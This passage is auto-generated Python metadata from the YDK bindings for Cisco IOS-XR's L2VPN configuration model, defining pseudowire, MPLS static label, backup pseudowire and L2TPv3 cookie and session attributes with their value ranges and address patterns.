'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-evpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns',
False,
[
_MetaInfoClassMember('pseudowire-evpn', REFERENCE_LIST, 'PseudowireEvpn' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns.PseudowireEvpn',
[], [],
''' EVPN P2P Service Configuration
''',
'pseudowire_evpn',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-evpns',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.MplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.MplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-mpls-static-labels', REFERENCE_CLASS, 'BackupMplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
[], [],
''' MPLS static labels
''',
'backup_mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('backup-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for the
backup PW
''',
'backup_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires',
False,
[
_MetaInfoClassMember('backup-pseudowire', REFERENCE_LIST, 'BackupPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire',
[], [],
''' Backup pseudowire for the cross connect
''',
'backup_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpRemoteCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpRemoteCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher remote cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower remote cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Remote cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-remote-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpSecondaryLocalCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher local cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower local cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Local cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-secondary-local-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpLocalCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpLocalCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher local cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower local cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Local cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-local-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes',
False,
[
_MetaInfoClassMember('l2tp-local-cookie', REFERENCE_CLASS, 'L2TpLocalCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpLocalCookie',
[], [],
''' L2TP local cookie
''',
'l2tp_local_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-local-session-id', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' L2TP local session ID
''',
'l2tp_local_session_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-remote-cookie', REFERENCE_CLASS, 'L2TpRemoteCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpRemoteCookie',
[], [],
''' L2TP remote cookie
''',
'l2tp_remote_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-remote-session-id', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' L2TP remote session ID
''',
'l2tp_remote_session_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-secondary-local-cookie', REFERENCE_CLASS, 'L2TpSecondaryLocalCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
[], [],
''' L2TP secondary local cookie
''',
'l2tp_secondary_local_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-static-attributes',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStatic' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStatic',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire L2TPv3 static
configuration
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-static',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Pseudowire IPv4 address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-pseudowires', REFERENCE_CLASS, 'BackupPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires',
[], [],
''' List of pseudowires
''',
'backup_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bandwidth', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Pseudowire Bandwidth
''',
'bandwidth',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the pseudowire class
''',
'class_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-static', REFERENCE_CLASS, 'L2TpStatic' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStatic',
[], [],
''' Pseudowire L2TPv3 static configuration
''',
'l2tp_static',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-static-attributes', REFERENCE_CLASS, 'L2TpStaticAttributes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes',
[], [],
''' L2TP Static Attributes
''',
'l2tp_static_attributes',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mpls-static-labels', REFERENCE_CLASS, 'MplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.MplsStaticLabels',
[], [],
''' MPLS static labels
''',
'mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', REFERENCE_UNION, 'str' , None, None,
[], [],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False, [
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
]),
_MetaInfoClassMember('tag-impose', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' Tag Impose vlan tagged mode
''',
'tag_impose',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'neighbor',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.MplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.MplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-mpls-static-labels', REFERENCE_CLASS, 'BackupMplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
[], [],
''' MPLS static labels
''',
'backup_mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('backup-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for the
backup PW
''',
'backup_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires',
False,
[
_MetaInfoClassMember('backup-pseudowire', REFERENCE_LIST, 'BackupPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire',
[], [],
''' Backup pseudowire for the cross connect
''',
'backup_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpRemoteCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpRemoteCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher remote cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower remote cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Remote cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-remote-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpSecondaryLocalCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher local cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower local cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Local cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-secondary-local-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpLocalCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpLocalCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher local cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower local cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Local cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-local-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes',
False,
[
_MetaInfoClassMember('l2tp-local-cookie', REFERENCE_CLASS, 'L2TpLocalCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpLocalCookie',
[], [],
''' L2TP local cookie
''',
'l2tp_local_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-local-session-id', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' L2TP local session ID
''',
'l2tp_local_session_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-remote-cookie', REFERENCE_CLASS, 'L2TpRemoteCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpRemoteCookie',
[], [],
''' L2TP remote cookie
''',
'l2tp_remote_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-remote-session-id', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' L2TP remote session ID
''',
'l2tp_remote_session_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-secondary-local-cookie', REFERENCE_CLASS, 'L2TpSecondaryLocalCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
[], [],
''' L2TP secondary local cookie
''',
'l2tp_secondary_local_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-static-attributes',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStatic' : {
